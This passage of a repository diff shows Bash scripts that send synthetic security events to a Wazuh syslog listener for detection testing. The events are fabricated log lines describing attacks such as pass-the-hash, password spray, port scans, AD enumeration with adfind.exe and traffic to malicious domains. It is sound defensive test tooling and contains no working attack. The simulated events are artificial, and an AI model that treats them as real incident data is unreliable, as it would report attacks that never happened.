-    "event_type=windows_file_share_access event_id=5145 user=\"${SIM_USER}\" action=share_access src_ip=10.10.1.20 dst_host=filesrv-02 dst_port=445"
134 
-}
135 
-
136 
-emit_c3() {
137 
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
138 
-    "Multiple Authentication Success Across Hosts" \
139 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=app-01 dst_port=3389"
140 
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
141 
-    "Multiple Authentication Success Across Hosts" \
142 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=app-02 dst_port=3389"
143 
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
144 
-    "Multiple Authentication Success Across Hosts" \
145 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=db-01 dst_port=3389"
146 
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
147 
-    "Multiple Authentication Success Across Hosts" \
148 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=db-02 dst_port=3389"
149 
-  emit_c_usecase "C3-01" "C3" "high" "${WIN_HOST}" \
150 
-    "Multiple Authentication Success Across Hosts" \
151 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=fs-01 dst_port=3389"
152 
-
153 
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
154 
-    "SMB/RDP Lateral Burst Pattern" \
155 
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=rdp-01 dst_port=3389"
156 
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
157 
-    "SMB/RDP Lateral Burst Pattern" \
158 
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=smb-01 dst_port=445"
159 
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
160 
-    "SMB/RDP Lateral Burst Pattern" \
161 
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=smb-02 dst_port=445"
162 
-  emit_c_usecase "C3-02" "C3" "high" "${WIN_HOST}" \
163 
-    "SMB/RDP Lateral Burst Pattern" \
164 
-    "event_type=windows_lateral_movement event_id=4624 success=true user=\"ops.user\" src_ip=10.20.0.15 dst_host=rdp-02 dst_port=3389"
165 
-
166 
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
167 
-    "Admin Accessing Many Servers Rapidly" \
168 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-01 dst_port=3389"
169 
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
170 
-    "Admin Accessing Many Servers Rapidly" \
171 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-02 dst_port=3389"
172 
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
173 
-    "Admin Accessing Many Servers Rapidly" \
174 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-03 dst_port=3389"
175 
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
176 
-    "Admin Accessing Many Servers Rapidly" \
177 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-04 dst_port=3389"
178 
-  emit_c_usecase "C3-03" "C3" "critical" "${WIN_HOST}" \
179 
-    "Admin Accessing Many Servers Rapidly" \
180 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=10.20.0.22 dst_host=adm-05 dst_port=3389"
181 
-
182 
-  # C3-04 scanning behavior: many destination ports from same source
183 
-  for port in 80 88 135 139 389 443 445 464 636 1025 1433 1521 2049 2375 3306 3389 5432 5985 8080 8443; do
184 
-    emit_c_usecase "C3-04" "C3" "medium" "${WIN_HOST}" \
185 
-      "Internal Scanning Enumeration Behavior" \
186 
-      "event_type=internal_scan src_ip=10.30.0.40 dst_host=10.30.10.$((RANDOM % 10 + 1)) dst_port=${port} action=connect_attempt"
187 
-  done
188 
-}
189 
-
190 
-emit_selected_set() {
191 
-  local sel
192 
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
193 
-  case "${sel}" in
194 
-    all)
195 
-      emit_c1
196 
-      emit_c2
197 
-      emit_c3
198 
-      ;;
199 
-    c1|c1-*)
200 
-      emit_c1
201 
-      ;;
202 
-    c2|c2-*)
203 
-      emit_c2
204 
-      ;;
205 
-    c3|c3-*)
206 
-      emit_c3
207 
-      ;;
208 
-    *)
209 
-      emit_c1
210 
-      emit_c2
211 
-      emit_c3
212 
-      ;;
213 
-  esac
214 
-}
215 
-
216 
-echo "starting proposal Appendix C log simulator"
217 
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
218 
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
219 
-
220 
-if [[ "${FOREVER}" == "true" ]]; then
221 
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
222 
-  trap 'echo; echo "stopped"; exit 0' INT TERM
223 
-  while true; do
224 
-    emit_selected_set
225 
-    sleep "${DELAY}"
226 
-  done
227 
-else
228 
-  for ((i=1; i<=COUNT; i++)); do
229 
-    emit_selected_set
230 
-    if [[ "${i}" -lt "${COUNT}" ]]; then
231 
-      sleep "${DELAY}"
232 
-    fi
233 
-  done
234 
-  echo "done"
235 
-fi

+ 0 - 356
scripts/send-wazuh-proposal-required-events.sh
ファイルの表示 

@@ -1,356 +0,0 @@
1 
-#!/usr/bin/env bash
2 
-set -euo pipefail
3 
-
4 
-# Usage:
5 
-#   scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
6 
-#
7 
-# selector:
8 
-#   all | a1 | a2 | a3 | a4 | <usecase_id>
9 
-#   example usecase_id: A2-01, A3-05, A4-24
10 
-
11 
-SELECTOR="${1:-all}"
12 
-COUNT="${2:-1}"
13 
-DELAY="${3:-0.3}"
14 
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
15 
-DRY_RUN="${DRY_RUN:-0}"
16 
-FOREVER="false"
17 
-PROFILE="${PROFILE:-simulation}"
18 
-
19 
-for arg in "${@:4}"; do
20 
-  case "${arg}" in
21 
-    --forever)
22 
-      FOREVER="true"
23 
-      ;;
24 
-    --profile=*)
25 
-      PROFILE="${arg#*=}"
26 
-      ;;
27 
-    *)
28 
-      echo "error: unexpected argument '${arg}'"
29 
-      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
30 
-      exit 1
31 
-      ;;
32 
-  esac
33 
-done
34 
-
35 
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
36 
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
37 
-
38 
-FGT_DEVNAME="${FGT_DEVNAME:-FGT80F-Branch01}"
39 
-FGT_DEVID="${FGT_DEVID:-FGT80FTK20000001}"
40 
-WIN_HOST="${WIN_HOST:-win-dc01}"
41 
-DNS_HOST="${DNS_HOST:-dns-fw-01}"
42 
-SIM_VPN_USER="${SIM_VPN_USER:-remote.user}"
43 
-
44 
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
45 
-  echo "error: count must be a positive integer"
46 
-  exit 1
47 
-fi
48 
-
49 
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
50 
-  echo "error: delay must be numeric"
51 
-  exit 1
52 
-fi
53 
-
54 
-if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
55 
-  echo "error: EVENT_DELAY must be numeric"
56 
-  exit 1
57 
-fi
58 
-
59 
-if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
60 
-  echo "error: profile must be simulation or production"
61 
-  exit 1
62 
-fi
63 
-
64 
-rand_public_ip() {
65 
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
66 
-    echo "198.51.100.$((RANDOM % 240 + 10))"
67 
-  else
68 
-    echo "203.0.113.$((RANDOM % 240 + 10))"
69 
-  fi
70 
-}
71 
-
72 
-rand_private_ip() {
73 
-  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
74 
-}
75 
-
76 
-rand_domain() {
77 
-  echo "ioc-$((RANDOM % 9000 + 1000)).malicious.example"
78 
-}
79 
-
80 
-emit_syslog() {
81 
-  local msg="$1"
82 
-  local sent="false"
83 
-
84 
-  if [[ "${DRY_RUN}" == "1" ]]; then
85 
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
86 
-    return 0
87 
-  fi
88 
-
89 
-  if command -v nc >/dev/null 2>&1; then
90 
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
91 
-      sent="true"
92 
-    fi
93 
-  fi
94 
-
95 
-  if [[ "${sent}" != "true" ]]; then
96 
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
97 
-      sent="true"
98 
-    fi
99 
-  fi
100 
-
101 
-  if [[ "${sent}" != "true" ]]; then
102 
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
103 
-    return 1
104 
-  fi
105 
-
106 
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
107 
-}
108 
-
109 
-selector_matches() {
110 
-  local id="$1"
111 
-  local section="$2"
112 
-  local sel
113 
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
114 
-  local idl
115 
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
116 
-  local sec
117 
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
118 
-
119 
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
120 
-}
121 
-
122 
-emit_fgt_usecase() {
123 
-  local id="$1"
124 
-  local section="$2"
125 
-  local severity="$3"
126 
-  local usecase="$4"
127 
-  local body="$5"
128 
-
129 
-  selector_matches "${id}" "${section}" || return 0
130 
-
131 
-  local tags
132 
-  if [[ "${PROFILE}" == "production" ]]; then
133 
-    tags="soc_mvp_test=true source=fortigate severity=${severity}"
134 
-  else
135 
-    tags="soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
136 
-  fi
137 
-  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" ${tags} ${body}"
138 
-  sleep "${EVENT_DELAY}"
139 
-}
140 
-
141 
-emit_dns_usecase() {
142 
-  local id="$1"
143 
-  local section="$2"
144 
-  local severity="$3"
145 
-  local usecase="$4"
146 
-  local body="$5"
147 
-
148 
-  selector_matches "${id}" "${section}" || return 0
149 
-
150 
-  local tags
151 
-  if [[ "${PROFILE}" == "production" ]]; then
152 
-    tags="soc_mvp_test=true source=dns severity=${severity}"
153 
-  else
154 
-    tags="soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
155 
-  fi
156 
-  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} ${tags} ${body}"
157 
-  sleep "${EVENT_DELAY}"
158 
-}
159 
-
160 
-emit_windows_usecase() {
161 
-  local id="$1"
162 
-  local section="$2"
163 
-  local severity="$3"
164 
-  local usecase="$4"
165 
-  local body="$5"
166 
-
167 
-  selector_matches "${id}" "${section}" || return 0
168 
-
169 
-  local tags
170 
-  if [[ "${PROFILE}" == "production" ]]; then
171 
-    tags="soc_mvp_test=true source=windows severity=${severity}"
172 
-  else
173 
-    tags="soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
174 
-  fi
175 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} ${tags} ${body}"
176 
-  sleep "${EVENT_DELAY}"
177 
-}
178 
-
179 
-emit_a1() {
180 
-  local sip
181 
-  local domain
182 
-  local mip
183 
-  sip="$(rand_private_ip)"
184 
-  domain="$(rand_domain)"
185 
-  mip="$(rand_public_ip)"
186 
-
187 
-  emit_dns_usecase "A1-01" "A1" "medium" \
188 
-    "DNS Network Traffic Communicate to Malicious Domain" \
189 
-    "event_type=ioc_dns_traffic src_ip=${sip} query=${domain} resolved_ip=${mip} action=blocked"
190 
-
191 
-  emit_dns_usecase "A1-02" "A1" "medium" \
192 
-    "DNS Network Traffic Malicious Domain IOCs Detection" \
193 
-    "event_type=ioc_domain_match src_ip=${sip} ioc_type=domain ioc_value=${domain} feed=threatintel_main confidence=high action=alert"
194 
-}
195 
-
196 
-emit_a2() {
197 
-  local pub
198 
-  local sip
199 
-  pub="$(rand_public_ip)"
200 
-  sip="$(rand_private_ip)"
201 
-
202 
-  emit_fgt_usecase "A2-01" "A2" "high" "IPS IDS Network Traffic Allowed RDP from Public IPs" \
203 
-    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=${pub} dstip=${sip} dstport=3389 service=\"RDP\" action=\"accept\" policyid=44"
204 
-
205 
-  emit_fgt_usecase "A2-02" "A2" "high" "IPS IDS Firewall Account Admin Password Change" \
206 
-    "logid=\"0100044547\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"password-change\" target_account=\"admin\""
207 
-
208 
-  emit_fgt_usecase "A2-03" "A2" "high" "IPS IDS Firewall Account Create Add Admin Account" \
209 
-    "logid=\"0100044548\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"create-admin\" target_account=\"secops_admin\""
210 
-
211 
-  emit_fgt_usecase "A2-04" "A2" "high" "IPS IDS Firewall Configure Disabled Email Notification" \
212 
-    "logid=\"0100044551\" type=\"event\" subtype=\"system\" action=\"config-change\" config_item=\"alertemail\" config_value=\"disable\""
213 
-
214 
-  emit_fgt_usecase "A2-05" "A2" "low" "IPS IDS Firewall Configure Download Configure FW" \
215 
-    "logid=\"0100044552\" type=\"event\" subtype=\"system\" action=\"download-config\" user=\"admin\""
216 
-
217 
-  emit_fgt_usecase "A2-06" "A2" "medium" "IPS IDS IDS Alert Multiple Critical High" \
218 
-    "logid=\"0720018432\" type=\"utm\" subtype=\"ips\" action=\"detected\" attack=\"Multiple.Critical.High.Signatures\" severity=\"high\" count=7"
219 
-
220 
-  emit_fgt_usecase "A2-07" "A2" "low" "IPS IDS Network Traffic Port Scanning" \
221 
-    "logid=\"0720018433\" type=\"utm\" subtype=\"anomaly\" attack=\"TCP.Port.Scan\" srcip=${pub} dstip=${sip} action=\"detected\""
222 
-
223 
-  emit_fgt_usecase "A2-08" "A2" "medium" "IPS IDS Network Traffic IOC Detection" \
224 
-    "logid=\"0720018434\" type=\"utm\" subtype=\"ips\" ioc_type=ip ioc_value=$(rand_public_ip) action=\"blocked\""
225 
-
226 
-  emit_fgt_usecase "A2-09" "A2" "medium" "IPS IDS Network Traffic Port Scanning from Private IP" \
227 
-    "logid=\"0720018435\" type=\"utm\" subtype=\"anomaly\" attack=\"Internal.Port.Scan\" srcip=$(rand_private_ip) dstip=$(rand_private_ip) action=\"detected\""
228 
-
229 
-  emit_fgt_usecase "A2-10" "A2" "medium" "IPS IDS Network Traffic Communicate to Malicious IP" \
230 
-    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=$(rand_private_ip) dstip=$(rand_public_ip) threat_label=\"known-c2\" action=\"accept\""
231 
-}
232 
-
233 
-emit_a3() {
234 
-  local out_th
235 
-  out_th="$(rand_public_ip)"
236 
-
237 
-  emit_fgt_usecase "A3-01" "A3" "high" "VPN Authentication Success from Guest Account" \
238 
-    "logid=\"0101037131\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"guest\" srcip=${out_th} country=\"TH\""
239 
-
240 
-  emit_fgt_usecase "A3-02" "A3" "high" "VPN Authentication Success from Multiple Country" \
241 
-    "logid=\"0101037132\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" previous_country=\"TH\""
242 
-
243 
-  emit_fgt_usecase "A3-03" "A3" "high" "VPN Authentication Brute Force Success" \
244 
-    "logid=\"0101037133\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} failed_attempts_before_success=18"
245 
-
246 
-  emit_fgt_usecase "A3-04" "A3" "low" "VPN Authentication Multiple Fail Many Accounts from One Source" \
247 
-    "logid=\"0101037134\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-fail\" srcip=${out_th} failed_accounts=12"
248 
-
249 
-  emit_fgt_usecase "A3-05" "A3" "high" "VPN Authentication Success from Outside Thailand" \
250 
-    "logid=\"0101037135\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" expected_country=\"TH\""
251 
-}
252 
-
253 
-emit_a4() {
254 
-  emit_windows_usecase "A4-01" "A4" "medium" "Windows Authentication Multiple Fail from Privileged Account" \
255 
-    "event_id=4625 account=\"administrator\" src_ip=$(rand_private_ip) fail_count=9"
256 
-  emit_windows_usecase "A4-02" "A4" "medium" "Windows Authentication Multiple Fail from Service Account" \
257 
-    "event_id=4625 account=\"svc_backup\" src_ip=$(rand_private_ip) fail_count=11"
258 
-  emit_windows_usecase "A4-03" "A4" "medium" "Windows AD Enumeration with Malicious Tools" \
259 
-    "event_id=4688 process=\"adfind.exe\" user=\"user1\" host=\"${WIN_HOST}\""
260 
-  emit_windows_usecase "A4-04" "A4" "medium" "Windows Authentication Fail from Public IPs" \
261 
-    "event_id=4625 account=\"user1\" src_ip=$(rand_public_ip) fail_count=4"
262 
-  emit_windows_usecase "A4-05" "A4" "medium" "Windows File Share Enumeration to Single Destination" \
263 
-    "event_id=5145 account=\"user1\" src_ip=$(rand_private_ip) share=\"\\\\\\\\fileserver\\\\finance\" object_count=87"
264 
-  emit_windows_usecase "A4-06" "A4" "high" "Windows Authentication Success from Public IPs" \
265 
-    "event_id=4624 account=\"user2\" src_ip=$(rand_public_ip) logon_type=10"
266 
-  emit_windows_usecase "A4-07" "A4" "high" "Windows Authentication Privileged Account Impersonation" \
267 
-    "event_id=4624 account=\"administrator\" impersonation=true source_account=\"user2\""
268 
-  emit_windows_usecase "A4-08" "A4" "high" "Windows Authentication Successful Pass the Hash RDP" \
269 
-    "event_id=4624 account=\"administrator\" logon_type=10 auth_package=\"NTLM\" pth_indicator=true"
270 
-  emit_windows_usecase "A4-09" "A4" "high" "Windows Authentication Success from Guest Account" \
271 
-    "event_id=4624 account=\"guest\" logon_type=3"
272 
-  emit_windows_usecase "A4-10" "A4" "high" "Windows Authentication Interactive Logon Success by Service Account" \
273 
-    "event_id=4624 account=\"svc_backup\" logon_type=2"
274 
-  emit_windows_usecase "A4-11" "A4" "high" "Windows Account Added to Privileged Custom Group" \
275 
-    "event_id=4732 account=\"user3\" target_group=\"SOC-Privileged-Custom\""
276 
-  emit_windows_usecase "A4-12" "A4" "high" "Windows Account Added to Privileged Group" \
277 
-    "event_id=4728 account=\"user3\" target_group=\"Domain Admins\""
278 
-  emit_windows_usecase "A4-13" "A4" "high" "Windows Domain Configure DSRM Password Reset" \
279 
-    "event_id=4794 account=\"administrator\" action=\"dsrm-password-reset\""
280 
-  emit_windows_usecase "A4-14" "A4" "low" "Windows Authentication Multiple Fail One Account from Many Sources" \
281 
-    "event_id=4625 account=\"user4\" src_count=15 fail_count=28"
282 
-  emit_windows_usecase "A4-15" "A4" "low" "Windows Authentication Multiple Fail Many Accounts from One Source" \
283 
-    "event_id=4625 src_ip=$(rand_private_ip) account_count=18 fail_count=42"
284 
-  emit_windows_usecase "A4-16" "A4" "low" "Windows Authentication Multiple Fail from Guest Account" \
285 
-    "event_id=4625 account=\"guest\" fail_count=9"
286 
-  emit_windows_usecase "A4-17" "A4" "low" "Windows Authentication Multiple Fail One Account from One Source" \
287 
-    "event_id=4625 account=\"user5\" src_ip=$(rand_private_ip) fail_count=10"
288 
-  emit_windows_usecase "A4-18" "A4" "low" "Windows Authentication Multiple Interactive Logon Denied" \
289 
-    "event_id=4625 account=\"user6\" logon_type=2 fail_count=7"
290 
-  emit_windows_usecase "A4-19" "A4" "low" "Windows Authentication Password Spray" \
291 
-    "event_id=4625 spray=true src_ip=$(rand_public_ip) attempted_accounts=25"
292 
-  emit_windows_usecase "A4-20" "A4" "low" "Windows Authentication Attempt from Disabled Account" \
293 
-    "event_id=4625 account=\"disabled.user\" status=\"0xC0000072\""
294 
-  emit_windows_usecase "A4-21" "A4" "low" "Windows Domain Account Created" \
295 
-    "event_id=4720 account=\"new.domain.user\" account_type=\"domain\""
296 
-  emit_windows_usecase "A4-22" "A4" "low" "Windows Local Account Re Enabled" \
297 
-    "event_id=4722 account=\"local.user\" account_type=\"local\""
298 
-  emit_windows_usecase "A4-23" "A4" "low" "Windows Local Account Created" \
299 
-    "event_id=4720 account=\"local.new\" account_type=\"local\""
300 
-  emit_windows_usecase "A4-24" "A4" "low" "Windows Domain Account Re Enabled" \
301 
-    "event_id=4722 account=\"domain.reenabled\" account_type=\"domain\""
302 
-}
303 
-
304 
-emit_selected_set() {
305 
-  local sel
306 
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
307 
-
308 
-  case "${sel}" in
309 
-    all)
310 
-      emit_a1
311 
-      emit_a2
312 
-      emit_a3
313 
-      emit_a4
314 
-      ;;
315 
-    a1|a1-*)
316 
-      emit_a1
317 
-      ;;
318 
-    a2|a2-*)
319 
-      emit_a2
320 
-      ;;
321 
-    a3|a3-*)
322 
-      emit_a3
323 
-      ;;
324 
-    a4|a4-*)
325 
-      emit_a4
326 
-      ;;
327 
-    *)
328 
-      # Exact usecase selectors (e.g. A3-05) are handled by selector_matches.
329 
-      emit_a1
330 
-      emit_a2
331 
-      emit_a3
332 
-      emit_a4
333 
-      ;;
334 
-  esac
335 
-}
336 
-
337 
-echo "starting proposal-required log simulator"
338 
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
339 
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
340 
-
341 
-if [[ "${FOREVER}" == "true" ]]; then
342 
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
343 
-  trap 'echo; echo "stopped"; exit 0' INT TERM
344 
-  while true; do
345 
-    emit_selected_set
346 
-    sleep "${DELAY}"
347 
-  done
348 
-else
349 
-  for ((i=1; i<=COUNT; i++)); do
350 
-    emit_selected_set
351 
-    if [[ "${i}" -lt "${COUNT}" ]]; then
352 
-      sleep "${DELAY}"
353 
-    fi
354 
-  done
355 
-  echo "done"
356 
-fi

+ 550 - 0
scripts/send-wazuh-sim-logs.sh
ファイルの表示 

@@ -0,0 +1,550 @@
1 
+#!/usr/bin/env bash
2 
+set -euo pipefail
3 
+
4 
+# Combined Wazuh simulator script (single entrypoint)
5 
+# Replays production-style sample logs from samples/*.log to Wazuh syslog UDP.
6 
+#
7 
+# Usage:
8 
+#   scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run] [--no-mock] [--no-guarantee-hits] [--random-types] [--include-nonalerts] [--docker-send]
9 
+#
10 
+# Selectors:
11 
+#   all
12 
+#   a|b|c|appendix-a|appendix-b|appendix-c
13 
+#   a1|a2|a3|a4|b1|b2|b3|c1|c2|c3
14 
+#   A1-01, A2-10, B3-06, C1-01, ...
15 
+
16 
+SELECTOR="${1:-all}"
17 
+COUNT="${2:-1}"
18 
+DELAY="${3:-1}"
19 
+shift $(( $# >= 3 ? 3 : $# )) || true
20 
+
21 
+FOREVER=0
22 
+DRY_RUN="${DRY_RUN:-0}"
23 
+MOCK_VALUES="${MOCK_VALUES:-1}"
24 
+GUARANTEE_HITS="${GUARANTEE_HITS:-1}"
25 
+RANDOM_TYPES="${RANDOM_TYPES:-0}"
26 
+INCLUDE_NONALERTS="${INCLUDE_NONALERTS:-0}"
27 
+DOCKER_SEND="${DOCKER_SEND:-0}"
28 
+WAZUH_MANAGER_CONTAINER="${WAZUH_MANAGER_CONTAINER:-wazuh-single-wazuh.manager-1}"
29 
+
30 
+for arg in "$@"; do
31 
+  case "$arg" in
32 
+    --forever)
33 
+      FOREVER=1
34 
+      ;;
35 
+    --dry-run)
36 
+      DRY_RUN=1
37 
+      ;;
38 
+    --no-mock)
39 
+      MOCK_VALUES=0
40 
+      ;;
41 
+    --mock)
42 
+      MOCK_VALUES=1
43 
+      ;;
44 
+    --no-guarantee-hits)
45 
+      GUARANTEE_HITS=0
46 
+      ;;
47 
+    --guarantee-hits)
48 
+      GUARANTEE_HITS=1
49 
+      ;;
50 
+    --random-types)
51 
+      RANDOM_TYPES=1
52 
+      ;;
53 
+    --include-nonalerts)
54 
+      INCLUDE_NONALERTS=1
55 
+      ;;
56 
+    --docker-send)
57 
+      DOCKER_SEND=1
58 
+      ;;
59 
+    -h|--help)
60 
+      echo "usage: scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run] [--no-mock] [--no-guarantee-hits] [--random-types] [--include-nonalerts] [--docker-send]"
61 
+      exit 0
62 
+      ;;
63 
+    *)
64 
+      echo "error: unknown option '$arg'"
65 
+      exit 1
66 
+      ;;
67 
+  esac
68 
+done
69 
+
70 
+if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [ "$COUNT" -lt 1 ]; then
71 
+  echo "error: count must be a positive integer"
72 
+  exit 1
73 
+fi
74 
+
75 
+if ! [[ "$DELAY" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
76 
+  echo "error: delay_seconds must be numeric"
77 
+  exit 1
78 
+fi
79 
+
80 
+WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
81 
+WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
82 
+NC_WAIT_SECONDS="${NC_WAIT_SECONDS:-0}"
83 
+STRICT_SEND="${STRICT_SEND:-1}"
84 
+BASE_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
85 
+SAMPLES_DIR="${BASE_DIR}/samples"
86 
+
87 
+normalize() {
88 
+  printf '%s' "$1" | tr '[:upper:]' '[:lower:]'
89 
+}
90 
+
91 
+is_valid_selector() {
92 
+  local sel
93 
+  sel="$(normalize "$1")"
94 
+  case "$sel" in
95 
+    all|a|b|c|appendix-a|appendix-b|appendix-c|a1|a2|a3|a4|b1|b2|b3|c1|c2|c3)
96 
+      return 0
97 
+      ;;
98 
+    [abc][0-9]-[0-9][0-9])
99 
+      return 0
100 
+      ;;
101 
+    *)
102 
+      return 1
103 
+      ;;
104 
+  esac
105 
+}
106 
+
107 
+selector_matches_tag() {
108 
+  local selector tag sel tagl
109 
+  selector="$1"
110 
+  tag="$2"
111 
+  sel="$(normalize "$selector")"
112 
+  tagl="$(normalize "$tag")"
113 
+
114 
+  if [ -z "$tagl" ]; then
115 
+    case "$sel" in
116 
+      all|a|b|c|appendix-a|appendix-b|appendix-c)
117 
+        return 0
118 
+        ;;
119 
+      *)
120 
+        return 1
121 
+        ;;
122 
+    esac
123 
+  fi
124 
+
125 
+  case "$sel" in
126 
+    all)
127 
+      return 0
128 
+      ;;
129 
+    a|appendix-a)
130 
+      [[ "$tagl" == a* ]]
131 
+      return
132 
+      ;;
133 
+    b|appendix-b)
134 
+      [[ "$tagl" == b* ]]
135 
+      return
136 
+      ;;
137 
+    c|appendix-c)
138 
+      [[ "$tagl" == c* ]]
139 
+      return
140 
+      ;;
141 
+    a1|a2|a3|a4|b1|b2|b3|c1|c2|c3)
142 
+      [[ "$tagl" == "$sel"-* ]]
143 
+      return
144 
+      ;;
145 
+    [abc][0-9]-[0-9][0-9])
146 
+      [[ "$tagl" == "$sel" ]]
147 
+      return
148 
+      ;;
149 
+    *)
150 
+      return 1
151 
+      ;;
152 
+  esac
153 
+}
154 
+
155 
+sample_files_for_selector() {
156 
+  local sel
157 
+  sel="$(normalize "$1")"
158 
+  case "$sel" in
159 
+    all)
160 
+      echo "${SAMPLES_DIR}/appendix-a-production-samples.log"
161 
+      echo "${SAMPLES_DIR}/appendix-b-production-samples.log"
162 
+      echo "${SAMPLES_DIR}/appendix-c-production-samples.log"
163 
+      ;;
164 
+    a|appendix-a|a1|a2|a3|a4|a[0-9]-[0-9][0-9])
165 
+      echo "${SAMPLES_DIR}/appendix-a-production-samples.log"
166 
+      ;;
167 
+    b|appendix-b|b1|b2|b3|b[0-9]-[0-9][0-9])
168 
+      echo "${SAMPLES_DIR}/appendix-b-production-samples.log"
169 
+      ;;
170 
+    c|appendix-c|c1|c2|c3|c[0-9]-[0-9][0-9])
171 
+      echo "${SAMPLES_DIR}/appendix-c-production-samples.log"
172 
+      ;;
173 
+    *)
174 
